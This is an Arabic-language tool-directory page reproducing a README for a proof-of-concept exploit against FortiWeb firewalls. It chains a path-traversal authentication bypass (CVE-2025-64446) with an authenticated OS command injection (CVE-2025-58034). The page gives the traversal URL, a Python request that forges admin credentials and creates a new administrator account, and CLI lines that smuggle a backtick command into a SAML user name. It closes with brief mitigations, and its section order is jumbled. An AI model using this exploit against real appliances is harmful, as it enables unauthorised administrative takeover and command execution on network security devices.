Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FORTIWEB_CVE-2025-64446-58034 — استغلال PoC لثغرات FortiWeb: تجاوز المصادقة عبر اجتياز المسار وحقن أوامر نظام التشغيل بعد المصادقة. يتضمن تحليلاً مفصلاً وحمولات وإرشادات تخفيف لاختبار الأمان. | Kitploit
أدوات/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

استغلال PoC لثغرات FortiWeb: تجاوز المصادقة عبر اجتياز المسار وحقن أوامر نظام التشغيل بعد المصادقة. يتضمن تحليلاً مفصلاً وحمولات وإرشادات تخفيف لاختبار الأمان.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
4منذ 5 أشهرلم تتم المراجعة بعد

محاكاة استغلال FortiWeb (CVE-2025-64446 & CVE-2025-58034)

ملاحظة:

  • هذا المستند مخصص لأغراض التعلم والبحث الأمني فقط.
  • لا تستخدمه لمهاجمة الأنظمة دون إذن.

1. نظرة عامة

FortiWeb هو جهاز جدار حماية تطبيقات الويب (WAF) يستخدم لحماية تطبيقات الويب.

في عام 2025، تم اكتشاف ثغرتين خطيرتين:

  • CVE-2025-64446 – تجاوز المصادقة عبر اجتياز المسار (Path Traversal)
  • CVE-2025-58034 – حقن أوامر نظام التشغيل (OS Command Injection)

2. نظرة عامة على CVE-2025-64446

البندالمحتوى
نوع الثغرةاجتياز المسار النسبي
تجاوز المصادقة
السببمعالجة FortiWeb للمسارات بشكل غير صارم قبل المصادقة:

- التحكم في الوصول بناءً على سلسلة المسار المنطقي
- عدم تسوية (normalize) المسار بالكامل
- السماح باستخدام ../ للوصول إلى الموارد الداخلية
الوصفيمكن الوصول إلى بعض نقاط النهاية الإدارية دون مصادقة صالحة
الضرر- تجاوز المصادقة بالكامل
- الوصول غير المصرح به إلى وظائف المسؤول
- اختراق نموذج التفويض
الإصدارات المتأثرة- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

مثال:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. نظرة عامة على CVE-2025-58034


4. عملية التجربة (POC)

4.1. إعداد البيئة:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

يساعد هذا في تجنب تعارض إصدارات المكتبات، وضمان استقرار بيئة العمل، وتقليل التأثير على النظام

venv-git

4.2 الاستغلال

الحمولة (Payload)

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

تشغيل الأداة باستخدام Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: عنوان IP هنا هو اسم مضيف جهاز FortiWeb.

exploit

الحصول على اسم المستخدم وكلمة المرور -> ثم تسجيل الدخول

login

connect

تم الاستغلال بنجاح وإنشاء حساب جديد بصلاحيات المسؤول.

4.3 استغلال CVE-2025-58034 بعد تسجيل الدخول بالحساب

بعد تسجيل الدخول بنجاح باستخدام حساب المسؤول المنشأ حديثاً، يمكن للمهاجم استغلال ثغرة حقن الأوامر الموثقة من خلال طلبات مصممة خصيصاً أو مباشرة عبر واجهة سطر الأوامر (CLI) الخاصة بـ FortiWeb:

root@kitploit:~
config user saml-user

edit "`id`" ## أدخل الأمر هنا

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

سيخرج FortiWeb من سلسلة التكوين وينفذ الأمر id أثناء تكوين saml-user.

5. بعض طرق تخفيف الثغرات

  • تحديث FortiWeb إلى الإصدار المصحح.
  • تقييد الوصول إلى واجهة الإدارة.
  • عدم تعريض واجهة الإدارة للإنترنت.
  • التحقق من وجود حسابات مسؤول غير طبيعية.

6. مراجع إضافية

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
تنزيل الأداة
البندالمحتوى
نوع الثغرةحقن أوامر نظام التشغيل (CWE-78)
السببمعالجة FortiWeb للإدخال بشكل غير آمن عند تنفيذ أوامر نظام التشغيل:

- عدم التحقق من صحة الإدخال
- عدم الهروب من الأحرف الخاصة
- تمرير بيانات المستخدم مباشرة إلى أمر النظام
الوصفتتطلب الثغرة مصادقة لكنها تسمح بحقن أوامر النظام
الضرر- تنفيذ أوامر غير مرغوب فيها
- الوصول إلى موارد النظام
- التأثير على السلامة والتوفر
الإصدارات المتأثرة- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11